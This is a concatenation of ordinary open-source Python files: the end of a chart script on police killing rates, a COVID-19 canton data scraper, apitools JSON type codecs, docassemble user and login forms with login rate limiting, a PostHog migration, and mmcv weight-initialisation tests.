clabels= { BarChartLabelPosition.INSIDE : label_if(artial(op.ge,0.5), lambda c,r,v: "{:.2f} ({:,} total)".format(v, df.policedeaths_total[df.index[r]])),
BarChartLabelPosition.OUTSIDE: label_if(artial(op.lt,0.5), lambda c,r,v: "{:.1g} ({:,} total)".format(v, df.policedeaths_total[df.index[r]])) },
grid_interval=0.25, grid_width=s(1), label_interval=0.5, ymax=3.6, ylabel=Image.from_multitext(["killings by law enforcement officers per million population (2015) ", "(estimates)"], [FONT(BIGFONT), FONT(SMALLFONT)]).pad(s(5),0))
# Put it all together
chart = Image.from_column([policedeaths, Image.from_row([guns, homicides])], padding=s(20))
title = Image.from_column([Image.from_text("Police killing rates in G7 members".upper(), FONT(TITLEFONT, bold=True)), Image.from_text("compared to gun ownership and homicide rates", FONT(SUBTITLEFONT))])
# footer = Image.from_markup(
# "**Police killing estimates** from //The Counted// (US), //A Toutes Les Victimes// (France), //UK Home Office// (UK),\n //Schusswaffeneinsatz.de// (Germany), //Wikipedia// (Canada), //ACAD// (Italy) and additional media reports.\n"
# "**Gun ownership data** from the //IHEID Small Arms Survey (2007)//.\n"
# "**Homicide data** from the //United Nations Office on Drugs and Crime// website.", partial(FONT, FONTSIZE), padding=s(5))
img = Image.from_column([title, chart], padding=s(5), bg="white")
# background = Image.from_url_with_cache("http://trueblueline.net/wp-content/uploads/2015/05/o-POLICE-LIGHTS-facebook.jpg").crop_to_aspect(img.width, img.height).resize(img.size).brighten(0.75)
# img = background.place(img)
#img.place(Image.from_text("/u/Udzu", font("arial", FONTSIZE), fg="black", bg=None, padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/g7_police.png")
|
scrapers/scrape_nw.py | brunis83/covid_19 | 485 | 12610362 | <reponame>brunis83/covid_19
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from bs4 import BeautifulSoup
import scrape_common as sc
import scrape_nw_common as snc
url, soup = snc.get_nw_page()
item = soup.find(text=re.compile('Anzahl F.lle')).find_parent('p')
assert item, f"Could not find title item in {url}"
dd = sc.DayData(canton='NW', url=url)
dd.datetime = sc.find(r'Stand: (\d+\. .* 20\d{2})', item.text)
rows = item.find_next('table').findChildren('tr')
for row in rows:
cols = row.findChildren('td')
item = cols[0].text
if re.match(r'positiv getestete personen.*', item, re.I):
dd.cases = cols[1].text
dd.cases = dd.cases.replace('*', '')
elif re.match(r'derzeit hospitalisiert', item, re.I):
dd.hospitalized = cols[1].text
elif re.match(r'davon auf der intensivstation', item, re.I):
dd.icu = cols[1].text
elif re.match(r'verstorbene personen', item, re.I):
dd.deaths = cols[1].text
elif re.match(r'personen in isolation', item, re.I):
dd.isolated = cols[1].text
elif re.match(r'kontaktpersonen in quarant.ne', item, re.I):
dd.quarantined = cols[1].text
elif re.match(r'Reiser.ckkehrer in quarant.ne', item, re.I):
dd.quarantine_riskareatravel = cols[1].text
is_first = True
if dd:
print(dd)
is_first = False
xls_url = 'http://www.nw.ch/coronastatistik'
xls = sc.xlsdownload(xls_url, silent=True)
rows = sc.parse_xls(xls, header_row=2)
for row in rows:
dd = sc.DayData(canton='NW', url=xls_url)
dd.datetime = row['A'].date().isoformat()
dd.cases = row['Positiv getestete Personen (kumuliert)']
dd.icu = row['Davon auf der Intensivstation']
try:
dd.hospitalized = row['Aktuell hospitalisierte Personen']
except KeyError:
dd.hospitalized = row['Hospitalisierte Personen']
try:
dd.deaths = row['Personen verstorben']
except KeyError:
dd.deaths = row['Verstorbene Personen']
# skip empty rows
if dd.cases is None and dd.icu is None and dd.hospitalized is None and dd.deaths is None:
continue
if not is_first:
print('-' * 10)
is_first = False
print(dd)
|
apitools/base/py/extra_types.py | SJ029626/apitools | 143 | 12610383 | <filename>apitools/base/py/extra_types.py<gh_stars>100-1000
#!/usr/bin/env python
#
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Extra types understood by apitools."""
import datetime
import json
import numbers
import six
from apitools.base.protorpclite import message_types
from apitools.base.protorpclite import messages
from apitools.base.protorpclite import protojson
from apitools.base.py import encoding_helper as encoding
from apitools.base.py import exceptions
from apitools.base.py import util
if six.PY3:
from collections.abc import Iterable
else:
from collections import Iterable
__all__ = [
'DateField',
'DateTimeMessage',
'JsonArray',
'JsonObject',
'JsonValue',
'JsonProtoEncoder',
'JsonProtoDecoder',
]
# pylint:disable=invalid-name
DateTimeMessage = message_types.DateTimeMessage
# pylint:enable=invalid-name
# We insert our own metaclass here to avoid letting ProtoRPC
# register this as the default field type for strings.
# * since ProtoRPC does this via metaclasses, we don't have any
# choice but to use one ourselves
# * since a subclass's metaclass must inherit from its superclass's
# metaclass, we're forced to have this hard-to-read inheritance.
#
# pylint: disable=protected-access
class _FieldMeta(messages._FieldMeta):
def __init__(cls, name, bases, dct): # pylint: disable=no-self-argument
# pylint: disable=super-init-not-called,non-parent-init-called
type.__init__(cls, name, bases, dct)
# pylint: enable=protected-access
class DateField(six.with_metaclass(_FieldMeta, messages.Field)):
"""Field definition for Date values."""
VARIANTS = frozenset([messages.Variant.STRING])
DEFAULT_VARIANT = messages.Variant.STRING
type = datetime.date
def _ValidateJsonValue(json_value):
entries = [(f, json_value.get_assigned_value(f.name))
for f in json_value.all_fields()]
assigned_entries = [(f, value)
for f, value in entries if value is not None]
if len(assigned_entries) != 1:
raise exceptions.InvalidDataError(
'Malformed JsonValue: %s' % json_value)
def _JsonValueToPythonValue(json_value):
"""Convert the given JsonValue to a json string."""
util.Typecheck(json_value, JsonValue)
_ValidateJsonValue(json_value)
if json_value.is_null:
return None
entries = [(f, json_value.get_assigned_value(f.name))
for f in json_value.all_fields()]
assigned_entries = [(f, value)
for f, value in entries if value is not None]
field, value = assigned_entries[0]
if not isinstance(field, messages.MessageField):
return value
elif field.message_type is JsonObject:
return _JsonObjectToPythonValue(value)
elif field.message_type is JsonArray:
return _JsonArrayToPythonValue(value)
def _JsonObjectToPythonValue(json_value):
util.Typecheck(json_value, JsonObject)
return dict([(prop.key, _JsonValueToPythonValue(prop.value)) for prop
in json_value.properties])
def _JsonArrayToPythonValue(json_value):
util.Typecheck(json_value, JsonArray)
return [_JsonValueToPythonValue(e) for e in json_value.entries]
_MAXINT64 = 2 << 63 - 1
_MININT64 = -(2 << 63)
def _PythonValueToJsonValue(py_value):
"""Convert the given python value to a JsonValue."""
if py_value is None:
return JsonValue(is_null=True)
if isinstance(py_value, bool):
return JsonValue(boolean_value=py_value)
if isinstance(py_value, six.string_types):
return JsonValue(string_value=py_value)
if isinstance(py_value, numbers.Number):
if isinstance(py_value, six.integer_types):
if _MININT64 < py_value < _MAXINT64:
return JsonValue(integer_value=py_value)
return JsonValue(double_value=float(py_value))
if isinstance(py_value, dict):
return JsonValue(object_value=_PythonValueToJsonObject(py_value))
if isinstance(py_value, Iterable):
return JsonValue(array_value=_PythonValueToJsonArray(py_value))
raise exceptions.InvalidDataError(
'Cannot convert "%s" to JsonValue' % py_value)
def _PythonValueToJsonObject(py_value):
util.Typecheck(py_value, dict)
return JsonObject(
properties=[
JsonObject.Property(key=key, value=_PythonValueToJsonValue(value))
for key, value in py_value.items()])
def _PythonValueToJsonArray(py_value):
return JsonArray(entries=list(map(_PythonValueToJsonValue, py_value)))
class JsonValue(messages.Message):
"""Any valid JSON value."""
# Is this JSON object `null`?
is_null = messages.BooleanField(1, default=False)
# Exactly one of the following is provided if is_null is False; none
# should be provided if is_null is True.
boolean_value = messages.BooleanField(2)
string_value = messages.StringField(3)
# We keep two numeric fields to keep int64 round-trips exact.
double_value = messages.FloatField(4, variant=messages.Variant.DOUBLE)
integer_value = messages.IntegerField(5, variant=messages.Variant.INT64)
# Compound types
object_value = messages.MessageField('JsonObject', 6)
array_value = messages.MessageField('JsonArray', 7)
class JsonObject(messages.Message):
"""A JSON object value.
Messages:
Property: A property of a JsonObject.
Fields:
properties: A list of properties of a JsonObject.
"""
class Property(messages.Message):
"""A property of a JSON object.
Fields:
key: Name of the property.
value: A JsonValue attribute.
"""
key = messages.StringField(1)
value = messages.MessageField(JsonValue, 2)
properties = messages.MessageField(Property, 1, repeated=True)
class JsonArray(messages.Message):
"""A JSON array value."""
entries = messages.MessageField(JsonValue, 1, repeated=True)
_JSON_PROTO_TO_PYTHON_MAP = {
JsonArray: _JsonArrayToPythonValue,
JsonObject: _JsonObjectToPythonValue,
JsonValue: _JsonValueToPythonValue,
}
_JSON_PROTO_TYPES = tuple(_JSON_PROTO_TO_PYTHON_MAP.keys())
def _JsonProtoToPythonValue(json_proto):
util.Typecheck(json_proto, _JSON_PROTO_TYPES)
return _JSON_PROTO_TO_PYTHON_MAP[type(json_proto)](json_proto)
def _PythonValueToJsonProto(py_value):
if isinstance(py_value, dict):
return _PythonValueToJsonObject(py_value)
if (isinstance(py_value, Iterable) and
not isinstance(py_value, six.string_types)):
return _PythonValueToJsonArray(py_value)
return _PythonValueToJsonValue(py_value)
def _JsonProtoToJson(json_proto, unused_encoder=None):
return json.dumps(_JsonProtoToPythonValue(json_proto))
def _JsonToJsonProto(json_data, unused_decoder=None):
return _PythonValueToJsonProto(json.loads(json_data))
def _JsonToJsonValue(json_data, unused_decoder=None):
result = _PythonValueToJsonProto(json.loads(json_data))
if isinstance(result, JsonValue):
return result
elif isinstance(result, JsonObject):
return JsonValue(object_value=result)
elif isinstance(result, JsonArray):
return JsonValue(array_value=result)
else:
raise exceptions.InvalidDataError(
'Malformed JsonValue: %s' % json_data)
# pylint:disable=invalid-name
JsonProtoEncoder = _JsonProtoToJson
JsonProtoDecoder = _JsonToJsonProto
# pylint:enable=invalid-name
encoding.RegisterCustomMessageCodec(
encoder=JsonProtoEncoder, decoder=_JsonToJsonValue)(JsonValue)
encoding.RegisterCustomMessageCodec(
encoder=JsonProtoEncoder, decoder=JsonProtoDecoder)(JsonObject)
encoding.RegisterCustomMessageCodec(
encoder=JsonProtoEncoder, decoder=JsonProtoDecoder)(JsonArray)
def _EncodeDateTimeField(field, value):
result = protojson.ProtoJson().encode_field(field, value)
return encoding.CodecResult(value=result, complete=True)
def _DecodeDateTimeField(unused_field, value):
result = protojson.ProtoJson().decode_field(
message_types.DateTimeField(1), value)
return encoding.CodecResult(value=result, complete=True)
encoding.RegisterFieldTypeCodec(_EncodeDateTimeField, _DecodeDateTimeField)(
message_types.DateTimeField)
def _EncodeInt64Field(field, value):
"""Handle the special case of int64 as a string."""
capabilities = [
messages.Variant.INT64,
messages.Variant.UINT64,
]
if field.variant not in capabilities:
return encoding.CodecResult(value=value, complete=False)
if field.repeated:
result = [str(x) for x in value]
else:
result = str(value)
return encoding.CodecResult(value=result, complete=True)
def _DecodeInt64Field(unused_field, value):
# Don't need to do anything special, they're decoded just fine
return encoding.CodecResult(value=value, complete=False)
encoding.RegisterFieldTypeCodec(_EncodeInt64Field, _DecodeInt64Field)(
messages.IntegerField)
def _EncodeDateField(field, value):
"""Encoder for datetime.date objects."""
if field.repeated:
result = [d.isoformat() for d in value]
else:
result = value.isoformat()
return encoding.CodecResult(value=result, complete=True)
def _DecodeDateField(unused_field, value):
date = datetime.datetime.strptime(value, '%Y-%m-%d').date()
return encoding.CodecResult(value=date, complete=True)
encoding.RegisterFieldTypeCodec(_EncodeDateField, _DecodeDateField)(DateField)
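# --- Added illustrative sketch (not part of the original apitools module) ---
# A minimal round trip through the JsonValue machinery defined above, calling the
# module-private helpers directly. Every name used here is defined in this file;
# only this example function itself is an addition.
def _json_value_roundtrip_sketch():
    py_value = {'name': 'example', 'count': 3, 'tags': ['a', 'b'], 'extra': None}
    # Wrap the plain Python structure into the JsonValue message hierarchy.
    proto = _PythonValueToJsonValue(py_value)
    # _ValidateJsonValue enforces that exactly one field of a JsonValue is set.
    _ValidateJsonValue(proto)
    # Converting back should be lossless for JSON-compatible values.
    assert _JsonValueToPythonValue(proto) == py_value
    return proto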
|
docassemble_webapp/docassemble/webapp/users/forms.py | Tucker-Eric/docassemble | 568 | 12610398 | <reponame>Tucker-Eric/docassemble<filename>docassemble_webapp/docassemble/webapp/users/forms.py
import sys
import re
from docassemble_flask_user.forms import RegisterForm, LoginForm, password_validator, unique_email_validator
from flask_wtf import FlaskForm
from wtforms import DateField, StringField, SubmitField, ValidationError, BooleanField, SelectField, SelectMultipleField, HiddenField, PasswordField, validators, TextAreaField
from wtforms.validators import DataRequired, Email, Optional
from wtforms.widgets import PasswordInput
from docassemble.base.functions import LazyWord as word, LazyArray
from docassemble.base.config import daconfig
from flask_login import current_user
import email.utils
from sqlalchemy import select
HTTP_TO_HTTPS = daconfig.get('behind https load balancer', False)
def get_requester_ip(req):
if not req:
return '127.0.0.1'
if HTTP_TO_HTTPS:
if 'X-Real-Ip' in req.headers:
return req.headers['X-Real-Ip']
elif 'X-Forwarded-For' in req.headers:
return req.headers['X-Forwarded-For']
return req.remote_addr
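# --- Added illustrative sketch (not part of docassemble) ---
# Shows how get_requester_ip() resolves the client address. FakeRequest is a
# hypothetical stand-in for a Flask request object; which value wins depends on the
# 'behind https load balancer' configuration flag read into HTTP_TO_HTTPS above.
def _requester_ip_sketch():
    class FakeRequest:
        headers = {'X-Real-Ip': '203.0.113.7', 'X-Forwarded-For': '198.51.100.9'}
        remote_addr = '10.0.0.1'
    # With HTTP_TO_HTTPS False the proxy headers are ignored and remote_addr is returned;
    # with HTTP_TO_HTTPS True, X-Real-Ip takes precedence over X-Forwarded-For.
    return get_requester_ip(FakeRequest())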
try:
import ldap
except ImportError:
if 'ldap login' not in daconfig:
daconfig['ldap login'] = dict()
daconfig['ldap login']['enable'] = False
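# --- Added illustrative note (not part of docassemble) ---
# The LDAP branches below read these keys from daconfig['ldap login']; a minimal
# hypothetical configuration (placeholder values only) would look like:
#     daconfig['ldap login'] = {
#         'enable': True,
#         'server': 'ldap.example.com',
#         'base dn': 'ou=people,dc=example,dc=com',
#         'bind email': 'cn=admin,dc=example,dc=com',
#         'bind password': 'change-me',
#         'search pattern': 'mail=%s',
#     }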
def fix_nickname(form, field):
field.data = form.first_name.data + ' ' + form.last_name.data
return
class MySignInForm(LoginForm):
def validate(self):
from docassemble.webapp.daredis import r
from flask import request, abort
key = 'da:failedlogin:ip:' + str(get_requester_ip(request))
failed_attempts = r.get(key)
if failed_attempts is not None and int(failed_attempts) > daconfig['attempt limit']:
abort(404)
if daconfig['ldap login'].get('enable', False):
ldap_server = daconfig['ldap login'].get('server', 'localhost').strip()
username = self.email.data
            password = self.password.data
connect = ldap.initialize('ldap://' + ldap_server)
connect.set_option(ldap.OPT_REFERRALS, 0)
try:
connect.simple_bind_s(username, password)
if not (connect.whoami_s() is None):
connect.unbind_s()
from flask import current_app
user_manager = current_app.user_manager
user, user_email = user_manager.find_user_by_email(self.email.data)
if not user:
from docassemble.base.generate_key import random_alphanumeric
from docassemble.webapp.db_object import db
from docassemble.webapp.users.models import UserModel, Role
while True:
new_social = 'ldap$' + random_alphanumeric(32)
existing_user = db.session.execute(select(UserModel).filter_by(social_id=new_social)).scalar()
if existing_user:
continue
break
user = UserModel(social_id=new_social, email=self.email.data, nickname='', active=True)
user_role = db.session.execute(select(Role).filter_by(name='user')).scalar_one()
user.roles.append(user_role)
db.session.add(user)
db.session.commit()
result = True
else:
connect.unbind_s()
result = super().validate()
except (ldap.LDAPError, ldap.INVALID_CREDENTIALS):
connect.unbind_s()
result = super().validate()
else:
from flask import current_app
user_manager = current_app.user_manager
user, user_email = user_manager.find_user_by_email(self.email.data)
if user is None:
if daconfig.get('confirm registration', False):
self.email.errors = list()
self.email.errors.append(word("Incorrect Email and/or Password"))
self.password.errors = list()
self.password.errors.append(word("Incorrect Email and/or Password"))
else:
self.email.errors = list(self.email.errors)
self.email.errors.append(word("Account did not exist."))
return False
if user and (user.password is None or (user.social_id is not None and not user.social_id.startswith('local$'))):
self.email.errors = list(self.email.errors)
if user.social_id.startswith('google$'):
self.email.errors.append(word("You need to log in with Google."))
elif user.social_id.startswith('azure$'):
self.email.errors.append(word("You need to log in with Azure."))
elif user.social_id.startswith('auth0$'):
self.email.errors.append(word("You need to log in with Auth0."))
elif user.social_id.startswith('twitter$'):
self.email.errors.append(word("You need to log in with Twitter."))
elif user.social_id.startswith('facebook$'):
self.email.errors.append(word("You need to log in with Facebook."))
else:
self.email.errors.append(word("You cannot log in this way."))
return False
#sys.stderr.write("Trying super validate\n")
result = super().validate()
#sys.stderr.write("Super validate response was " + repr(result) + "\n")
if result is False:
r.incr(key)
r.expire(key, daconfig['ban period'])
elif failed_attempts is not None:
r.delete(key)
return result
def da_unique_email_validator(form, field):
if daconfig['ldap login'].get('enable', False) and daconfig['ldap login'].get('base dn', None) is not None and daconfig['ldap login'].get('bind email', None) is not None and daconfig['ldap login'].get('bind password', None) is not None:
ldap_server = daconfig['ldap login'].get('server', 'localhost').strip()
base_dn = daconfig['ldap login']['base dn'].strip()
search_filter = daconfig['ldap login'].get('search pattern', "mail=%s") % (form.email.data,)
connect = ldap.initialize('ldap://' + ldap_server)
try:
connect.simple_bind_s(daconfig['ldap login']['bind email'], daconfig['ldap login']['bind password'])
if len(connect.search_s(base_dn, ldap.SCOPE_SUBTREE, search_filter)) > 0:
raise ValidationError(word("This Email is already in use. Please try another one."))
except ldap.LDAPError:
pass
if daconfig.get('confirm registration', False):
return True
return unique_email_validator(form, field)
class MyRegisterForm(RegisterForm):
first_name = StringField(word('First name'), [validators.Length(min=0, max=255)])
last_name = StringField(word('Last name'), [validators.Length(min=0, max=255)])
social_id = StringField(word('Social ID'))
nickname = StringField(word('Nickname'), [fix_nickname])
email = StringField(word('Email'), validators=[
validators.DataRequired(word('Email is required')),
validators.Email(word('Invalid Email')),
da_unique_email_validator])
def length_two(form, field):
if len(field.data) != 2:
raise ValidationError(word('Must be a two-letter code'))
class NewPrivilegeForm(FlaskForm):
name = StringField(word('Name of new privilege'), validators=[
DataRequired(word('Name of new privilege is required'))])
submit = SubmitField(word('Add'))
class UserProfileForm(FlaskForm):
first_name = StringField(word('First name'), [validators.Length(min=0, max=255)])
last_name = StringField(word('Last name'), [validators.Length(min=0, max=255)])
country = StringField(word('Country code'), [validators.Length(min=0, max=2)])
subdivisionfirst = StringField(word('First subdivision'), [validators.Length(min=0, max=64)])
subdivisionsecond = StringField(word('Second subdivision'), [validators.Length(min=0, max=64)])
subdivisionthird = StringField(word('Third subdivision'), [validators.Length(min=0, max=64)])
organization = StringField(word('Organization'), [validators.Length(min=0, max=64)])
language = StringField(word('Language'), [validators.Length(min=0, max=64)])
timezone = SelectField(word('Time Zone'))
pypi_username = StringField(word('PyPI Username'))
    pypi_password = StringField(word('PyPI Password'))
confirmed_at = DateField(word('Confirmation Date'))
submit = SubmitField(word('Save'))
cancel = SubmitField(word('Cancel'))
class EditUserProfileForm(UserProfileForm):
email = StringField(word('E-mail'), validators=[Email(word('Must be a valid e-mail address')), DataRequired(word('E-mail is required'))])
role_id = SelectMultipleField(word('Privileges'), coerce=int)
active = BooleanField(word('Active'))
uses_mfa = BooleanField(word('Uses two-factor authentication'))
def validate(self, user_id, admin_id):
from flask import current_app
user_manager = current_app.user_manager
rv = UserProfileForm.validate(self)
if not rv:
return False
user, user_email = user_manager.find_user_by_email(self.email.data)
if user is not None and user.id != user_id:
self.email.errors.append(word('That e-mail address is already taken.'))
return False
if current_user.id == user_id:
if admin_id not in self.role_id.data:
self.role_id.errors.append(word('You cannot take away your own admin privilege.'))
return False
self.active.data = True
return True
class PhoneUserProfileForm(UserProfileForm):
def validate(self):
if self.email.data:
from flask_login import current_user
if current_user.social_id.startswith('phone$'):
from docassemble.webapp.db_object import db
from docassemble.webapp.users.models import UserModel
from flask import flash
existing_user = db.session.execute(select(UserModel).filter_by(email=self.email.data, active=True)).scalar()
if existing_user is not None and existing_user.id != current_user.id:
flash(word("Please choose a different e-mail address."), 'error')
return False
return super().validate()
email = StringField(word('E-mail'), validators=[Optional(), Email(word('Must be a valid e-mail address'))])
class RequestDeveloperForm(FlaskForm):
reason = StringField(word('Reason for needing developer account (optional)'))
submit = SubmitField(word('Submit'))
class MyInviteForm(FlaskForm):
def validate(self):
has_error = False
from flask import flash
if self.email.data:
for email_address in re.split(r'[\n\r]+', self.email.data.strip()):
(part_one, part_two) = email.utils.parseaddr(email_address)
if part_two == '':
the_errors = list(self.email.errors)
the_errors.append(word("Invalid e-mail address: " + email_address))
self.email.errors = tuple(the_errors)
has_error = True
if has_error:
return False
return super().validate()
email = TextAreaField(word('One or more e-mail addresses (separated by newlines)'), validators=[
validators.Required(word('At least one e-mail address must be listed'))
])
role_id = SelectField(word('Role'))
next = HiddenField()
submit = SubmitField(word('Invite'))
class UserAddForm(FlaskForm):
email = StringField(word('E-mail'), validators=[
validators.Required(word('E-mail is required')),
validators.Email(word('Invalid E-mail'))])
first_name = StringField(word('First name'), [validators.Length(min=0, max=255)])
last_name = StringField(word('Last name'), [validators.Length(min=0, max=255)])
role_id = SelectMultipleField(word('Privileges'), coerce=int)
password = StringField(word('Password'), widget=PasswordInput(hide_value=False), validators=[password_validator])
submit = SubmitField(word('Add'))
class PhoneLoginForm(FlaskForm):
phone_number = StringField(word('Phone number'), [validators.Length(min=5, max=255)])
submit = SubmitField(word('Go'))
class PhoneLoginVerifyForm(FlaskForm):
phone_number = StringField(word('Phone number'), [validators.Length(min=5, max=255)])
verification_code = StringField(word('Verification code'), [validators.Length(min=daconfig['verification code digits'], max=daconfig['verification code digits'])])
submit = SubmitField(word('Verify'))
def validate(self):
from docassemble.webapp.daredis import r
from docassemble.base.logger import logmessage
from flask import request, abort
result = True
key = 'da:failedlogin:ip:' + str(get_requester_ip(request))
failed_attempts = r.get(key)
if failed_attempts is not None and int(failed_attempts) > daconfig['attempt limit']:
abort(404)
verification_key = 'da:phonelogin:' + str(self.phone_number.data) + ':code'
verification_code = r.get(verification_key)
#r.delete(verification_key)
supplied_verification_code = re.sub(r'[^0-9]', '', self.verification_code.data)
logmessage("Supplied code is " + str(supplied_verification_code))
if verification_code is None:
logmessage("Verification code with " + str(verification_key) + " is None")
result = False
elif verification_code.decode() != supplied_verification_code:
logmessage("Verification code with " + str(verification_key) + " which is " + str(verification_code.decode()) + " does not match supplied code, which is " + str(self.verification_code.data))
result = False
else:
logmessage("Code matched")
if result is False:
logmessage("Problem with form")
r.incr(key)
r.expire(key, 86400)
elif failed_attempts is not None:
r.delete(key)
return result
class MFASetupForm(FlaskForm):
verification_code = StringField(word('Verification code'))
submit = SubmitField(word('Verify'))
class MFALoginForm(FlaskForm):
verification_code = StringField(word('Verification code'))
next = HiddenField()
submit = SubmitField(word('Verify'))
class MFAReconfigureForm(FlaskForm):
reconfigure = SubmitField(word('Reconfigure'))
disable = SubmitField(word('Disable'))
cancel = SubmitField(word('Cancel'))
class MFAChooseForm(FlaskForm):
auth = SubmitField(word('App'))
sms = SubmitField(word('SMS'))
cancel = SubmitField(word('Cancel'))
class MFASMSSetupForm(FlaskForm):
phone_number = StringField(word('Phone number'), [validators.Length(min=5, max=255)])
submit = SubmitField(word('Verify'))
class MFAVerifySMSSetupForm(FlaskForm):
verification_code = StringField(word('Verification code'))
submit = SubmitField(word('Verify'))
class MyResendConfirmEmailForm(FlaskForm):
email = StringField(word('Your e-mail address'), validators=[
validators.DataRequired(word('E-mail address is required')),
validators.Email(word('Invalid e-mail address')),
])
submit = SubmitField(word('Send confirmation email'))
class ManageAccountForm(FlaskForm):
confirm = StringField(word('Type \"delete my account\" here to confirm that you want to delete your account.'), [validators.AnyOf(LazyArray([word("delete my account")]), message=word('Since you did not type \"delete my account\" I did not delete your account.'))])
delete = SubmitField(word('Delete Account'))
|
posthog/migrations/0116_session_recording_retention_period.py | avoajaugochukwu/posthog | 7,409 | 12610409 | <reponame>avoajaugochukwu/posthog<filename>posthog/migrations/0116_session_recording_retention_period.py
# Generated by Django 3.0.11 on 2021-01-25 11:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("posthog", "0115_session_recording_viewed"),
]
operations = [
migrations.AddField(
model_name="team",
name="session_recording_retention_period_days",
field=models.IntegerField(default=None, null=True),
),
]
|
tests/test_cnn/test_weight_init.py | raoshenglong/mmcv | 3,748 | 12610417 | # Copyright (c) OpenMMLab. All rights reserved.
import random
from tempfile import TemporaryDirectory
import numpy as np
import pytest
import torch
from scipy import stats
from torch import nn
from mmcv.cnn import (Caffe2XavierInit, ConstantInit, KaimingInit, NormalInit,
PretrainedInit, TruncNormalInit, UniformInit, XavierInit,
bias_init_with_prob, caffe2_xavier_init, constant_init,
initialize, kaiming_init, normal_init, trunc_normal_init,
uniform_init, xavier_init)
def test_constant_init():
conv_module = nn.Conv2d(3, 16, 3)
constant_init(conv_module, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
assert conv_module.bias.allclose(torch.zeros_like(conv_module.bias))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
constant_init(conv_module_no_bias, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
def test_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
xavier_init(conv_module, bias=0.1)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
xavier_init(conv_module, distribution='uniform')
# TODO: sanity check of weight distribution, e.g. mean, std
with pytest.raises(AssertionError):
xavier_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
xavier_init(conv_module_no_bias)
def test_normal_init():
conv_module = nn.Conv2d(3, 16, 3)
normal_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_trunc_normal_init():
def _random_float(a, b):
return (b - a) * random.random() + a
def _is_trunc_normal(tensor, mean, std, a, b):
# scipy's trunc norm is suited for data drawn from N(0, 1),
# so we need to transform our data to test it using scipy.
z_samples = (tensor.view(-1) - mean) / std
z_samples = z_samples.tolist()
a0 = (a - mean) / std
b0 = (b - mean) / std
p_value = stats.kstest(z_samples, 'truncnorm', args=(a0, b0))[1]
return p_value > 0.0001
conv_module = nn.Conv2d(3, 16, 3)
mean = _random_float(-3, 3)
std = _random_float(.01, 1)
a = _random_float(mean - 2 * std, mean)
b = _random_float(mean, mean + 2 * std)
trunc_normal_init(conv_module, mean, std, a, b, bias=0.1)
assert _is_trunc_normal(conv_module.weight, mean, std, a, b)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
trunc_normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_uniform_init():
conv_module = nn.Conv2d(3, 16, 3)
uniform_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
uniform_init(conv_module_no_bias)
def test_kaiming_init():
conv_module = nn.Conv2d(3, 16, 3)
kaiming_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
kaiming_init(conv_module, distribution='uniform')
with pytest.raises(AssertionError):
kaiming_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
kaiming_init(conv_module_no_bias)
def test_caffe_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
caffe2_xavier_init(conv_module)
def test_bias_init_with_prob():
conv_module = nn.Conv2d(3, 16, 3)
prior_prob = 0.1
normal_init(conv_module, bias=bias_init_with_prob(0.1))
# TODO: sanity check of weight distribution, e.g. mean, std
bias = float(-np.log((1 - prior_prob) / prior_prob))
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, bias))
def test_constaninit():
"""test ConstantInit class."""
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
func = ConstantInit(val=1, bias=2, layer='Conv2d')
func(model)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert not torch.equal(model[2].weight,
torch.full(model[2].weight.shape, 1.))
assert not torch.equal(model[2].bias, torch.full(model[2].bias.shape, 2.))
func = ConstantInit(val=3, bias_prob=0.01, layer='Linear')
func(model)
res = bias_init_with_prob(0.01)
assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 1.))
assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 3.))
assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 2.))
assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))
# test layer key with base class name
model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
func = ConstantInit(val=4., bias=5., layer='_ConvNd')
func(model)
assert torch.all(model[0].weight == 4.)
assert torch.all(model[2].weight == 4.)
assert torch.all(model[0].bias == 5.)
assert torch.all(model[2].bias == 5.)
# test bias input type
with pytest.raises(TypeError):
func = ConstantInit(val=1, bias='1')
# test bias_prob type
with pytest.raises(TypeError):
func = ConstantInit(val=1, bias_prob='1')
# test layer input type
with pytest.raises(TypeError):
func = ConstantInit(val=1, layer=1)
def test_xavierinit():
"""test XavierInit class."""
